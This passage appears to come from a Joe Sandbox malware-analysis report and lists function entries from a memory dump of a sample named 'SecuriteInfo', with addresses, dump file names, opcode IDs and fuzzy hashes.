                                                                                                      Function 00007FF6C786F910 Relevance: .1, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e46230d8c0bb23a9b26f12389beaf27d8e9063d4bba2e4d98de2a57eaa924be5
                                                                                                      • Instruction ID: fdfe4ee0d6a7ea56f173fd1350f19943f7cf4889bb1c6bc56da8c7939e66a01e
                                                                                                      • Opcode Fuzzy Hash: e46230d8c0bb23a9b26f12389beaf27d8e9063d4bba2e4d98de2a57eaa924be5
                                                                                                      • Instruction Fuzzy Hash: 2A518232A3A65196E7248F29D0506287BA0EB49B5EF245131CFCDD7794DF3AE943C740
                                                                                                      Function 00007FF6C786F500 Relevance: .1, Instructions: 145COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f6a3dccb135ddd09f63c505db29ff29986bf9dd63497299e7c799fac6b959aa4
                                                                                                      • Instruction ID: 1bfc99781b095e8c4ee5b59fbf6ef10b37821678ce2c53688011e0673dffd06b
                                                                                                      • Opcode Fuzzy Hash: f6a3dccb135ddd09f63c505db29ff29986bf9dd63497299e7c799fac6b959aa4
                                                                                                      • Instruction Fuzzy Hash: 32518136A3A65196EB248F29D0442783BA1EB45B59F244131CF8DD77A8CF3AEE52C740
                                                                                                      Function 00007FF6C78794A0 Relevance: .1, Instructions: 126COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 813dec0fa54715c675ee5cc47bf1963a858e5d8d2b65cbdb6779cf38cdf6def8
                                                                                                      • Instruction ID: d10e9ddaab94f17e604ba3ce6d518c59d878364b6e6e05216ba4ae9b9fda67d9
                                                                                                      • Opcode Fuzzy Hash: 813dec0fa54715c675ee5cc47bf1963a858e5d8d2b65cbdb6779cf38cdf6def8
                                                                                                      • Instruction Fuzzy Hash: 3E41F772716A5582EF04CF6AD954169BBA2FB48FD0B499036EF8EC7B58DE3CD4428300
                                                                                                      Function 00007FF6C785D350 Relevance: .1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dd508fb2eb488edaf68b778ccb69d5fbf80095a4700453bc25d13363f741229f
                                                                                                      • Instruction ID: 309deaad0c6c40aa60fb7082b7f0a284561dd79ceb3608c97e66cf29be50ae22
                                                                                                      • Opcode Fuzzy Hash: dd508fb2eb488edaf68b778ccb69d5fbf80095a4700453bc25d13363f741229f
                                                                                                      • Instruction Fuzzy Hash: 3171996320638286D354CB79C149A8F7372FB25E08F3AC5398A48DE421E7AB854FD75D
                                                                                                      Function 00007FF6C785D600 Relevance: .1, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae06fb52789640934f630e7a9781bee4da1b21abc1da11e18385d3515b4c13f4
                                                                                                      • Instruction ID: 89017b7095616f708e8f5db45d0bfd17cfd2cc9034eedeb06edc40d12c5a7e68
                                                                                                      • Opcode Fuzzy Hash: ae06fb52789640934f630e7a9781bee4da1b21abc1da11e18385d3515b4c13f4
                                                                                                      • Instruction Fuzzy Hash: 90619A6320638286D354CB79818968B7372FB25E08F3AC139CA48DE021E7AB854FD75D
                                                                                                      Function 00007FF6C785E130 Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1eeac5ed2747b2a6fc5aa24d4ec808a47ceb74adb1beb6636bb708bc29fd1dc
                                                                                                      • Instruction ID: 5958419ddb7ff1dc65fb6f45cd90cd36ab2707d7199f9215317dd427bf5dea99
                                                                                                      • Opcode Fuzzy Hash: e1eeac5ed2747b2a6fc5aa24d4ec808a47ceb74adb1beb6636bb708bc29fd1dc
                                                                                                      • Instruction Fuzzy Hash: 3A519C6320638296D754CB39818968B7372FB25E08F3AD1388A48DE431E7AB854FD75D
                                                                                                      Function 00007FF6C785D920 Relevance: .1, Instructions: 76COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 36f92d5449a96ce308ed85680754bfba175086ead637a911d178b3dfc618404d
                                                                                                      • Instruction ID: c471796798ccf831849b5f49f2a6da941a0dd1e0b1d108ca38ce6c6b550b85b9
                                                                                                      • Opcode Fuzzy Hash: 36f92d5449a96ce308ed85680754bfba175086ead637a911d178b3dfc618404d
                                                                                                      • Instruction Fuzzy Hash: A141A86320639286C754CB3D918564F6772FB24E08B36D1388A58DE430F7AB868FD75C
                                                                                                      Function 00007FF6C785E010 Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba638456fca968f664461109a58dbe09f34695100afe40ee1b5b01cd6d3d3dae
                                                                                                      • Instruction ID: c0cc3c36b436e862749b672a93c7d68f6e888b073f4a9f622aab4a5ae5a3b501
                                                                                                      • Opcode Fuzzy Hash: ba638456fca968f664461109a58dbe09f34695100afe40ee1b5b01cd6d3d3dae
                                                                                                      • Instruction Fuzzy Hash: 19315F37206AA2C7D746EF34C065AEE77B0FB58F14722844AC72243651F774925DC74A
                                                                                                      Function 00007FF6C78902B0 Relevance: .1, Instructions: 68COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9f9d1623631322c0f436638ea519f1399f6939127f5aa1a546842922f7336e0d
                                                                                                      • Instruction ID: e02f2dcd624577c5d85e4a1f1dc871e0b16862a80dc6ee5798f6ed3dd1dc8489
                                                                                                      • Opcode Fuzzy Hash: 9f9d1623631322c0f436638ea519f1399f6939127f5aa1a546842922f7336e0d
                                                                                                      • Instruction Fuzzy Hash: DA21804794F6C74AE3A24F640DA71982FE5AB77615B4E50BAC7C4D72C3DD0F28099312
                                                                                                      Function 00007FF6C785F9F0 Relevance: .1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d51e850fe667c707d3badd8f9ba365bbb31719ed8d80b2d7b32bfcf5c63edb4
                                                                                                      • Instruction ID: f22f88d6cda6a452f9e263223f856862033a7adbb0b2041657fc9207242bc6b4
                                                                                                      • Opcode Fuzzy Hash: 6d51e850fe667c707d3badd8f9ba365bbb31719ed8d80b2d7b32bfcf5c63edb4
                                                                                                      • Instruction Fuzzy Hash: 3D217F37206AA2C7D786EF34C06AAEE73B0FB58F14712844AC72643641F778925CC74A
                                                                                                      Function 00007FF6C785CF70 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fafd1ae8305a66fa78aa1aff9ed54bcdddf7d7407dd5e02ef2bdfdcf7ca46b3
                                                                                                      • Instruction ID: 17d362827fbd44919fdf3c358e56f19a7cc0357e146ce98ad1ee00318b05067f
                                                                                                      • Opcode Fuzzy Hash: 6fafd1ae8305a66fa78aa1aff9ed54bcdddf7d7407dd5e02ef2bdfdcf7ca46b3
                                                                                                      • Instruction Fuzzy Hash: 1311F2770052C6D6C746CFB5C0819DAF3B5FB18F0476AC62B820487110FB39D2AACB89
                                                                                                      Function 00007FF6C788D660 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03a8157cee50fd3f03e0551a7c89415d97fe978660816f2e4eb80491d6b52f69
                                                                                                      • Instruction ID: 0a4ec16c06a9a7897fab86c67a0468d2461f9648072b9db243c407ea30460c79
                                                                                                      • Opcode Fuzzy Hash: 03a8157cee50fd3f03e0551a7c89415d97fe978660816f2e4eb80491d6b52f69
                                                                                                      • Instruction Fuzzy Hash: EAF06271B1A6958ADBE4CF28E8466297FE0E7483D5F908039D6DDC7F94DA3C90A18F04
                                                                                                      Function 00007FF6C785E3B0 Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2dd7a115447fe4d835552ee6c2ffec107b23a75132875a260b46f0f23fdc50f
                                                                                                      • Instruction ID: 22f19d0304595e824c2581d9b9935a4c167e222997acc99a748f38f79def1c73
                                                                                                      • Opcode Fuzzy Hash: a2dd7a115447fe4d835552ee6c2ffec107b23a75132875a260b46f0f23fdc50f
                                                                                                      • Instruction Fuzzy Hash: FCF000770052C696C746CBB5C08189AF3B5FB19F0576AC62B820087110FA69E2AAC789
                                                                                                      Function 00007FF6C785D240 Relevance: .0, Instructions: 22COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea4d63f2e6c65e337cc8d1ee1b814bbe38b6355ed5e2c3e407f4dfb9366f681a
                                                                                                      • Instruction ID: f1d5e76421cb110912c04eddf473b1736db0f70d93b85c8d0a9c62a99081382c
                                                                                                      • Opcode Fuzzy Hash: ea4d63f2e6c65e337cc8d1ee1b814bbe38b6355ed5e2c3e407f4dfb9366f681a
                                                                                                      • Instruction Fuzzy Hash: F4F0916310625292CB58CF39C14105BA772FF64F0937AC5388A188A124E3BEC65BD79C
                                                                                                      Function 00007FF6C785D090 Relevance: .0, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78e895a8854d57fab48baa2fcb91a05f682f1ba31858384382d4fba5be47ac01
                                                                                                      • Instruction ID: 341e868af591827babe58d6f45bc481a699d8e8dac2fc14a39424cc952d5f510
                                                                                                      • Opcode Fuzzy Hash: 78e895a8854d57fab48baa2fcb91a05f682f1ba31858384382d4fba5be47ac01
                                                                                                      • Instruction Fuzzy Hash: 37F0AA2310629292CB48CF39C04005BA372FF64F0937AC5388A188A124E3BEC68BD798
                                                                                                      Function 00007FF6C785DA90 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35763b16fc0ea44f54ad57ee831f0ab1efb1a630dc7c22efc4e6bfc2802b83ba
                                                                                                      • Instruction ID: f336dc9e9e796dbca2417acabbfdbdc146d6fc81571ab6155e8ffc60699b122a
                                                                                                      • Opcode Fuzzy Hash: 35763b16fc0ea44f54ad57ee831f0ab1efb1a630dc7c22efc4e6bfc2802b83ba
                                                                                                      • Instruction Fuzzy Hash: 86E0D12310629292CB08CF39C04005AA372EF64F0837AC0388A088A124E3BEC64BD398
                                                                                                      Function 00007FF6C78685D4 Relevance: .0, Instructions: 2COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 764c504831dcae6fed4f72b279cc35c02a426ea737900707234b1a4de097a301
                                                                                                      • Instruction ID: 8988677982b23f22eccfaab8a3e8e6c15e6c9044f283cf7483cb65e34bd15843
                                                                                                      • Opcode Fuzzy Hash: 764c504831dcae6fed4f72b279cc35c02a426ea737900707234b1a4de097a301
                                                                                                      • Instruction Fuzzy Hash: D6A0022291EC03F0E6848F01E8541302B30FB60302B840133D68DC10A4FF3DA640D744
                                                                                                      Function 00007FF6C7890008 Relevance: .0, Instructions: 1COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e8a7a31c33a269a59c1538be2bd036b2d1bd0459060e45bf358329a224fa751
                                                                                                      • Instruction ID: 227d60d4e3976e3cc6d276643604bb099d91ca20d1322c60905afdab92b8c05f
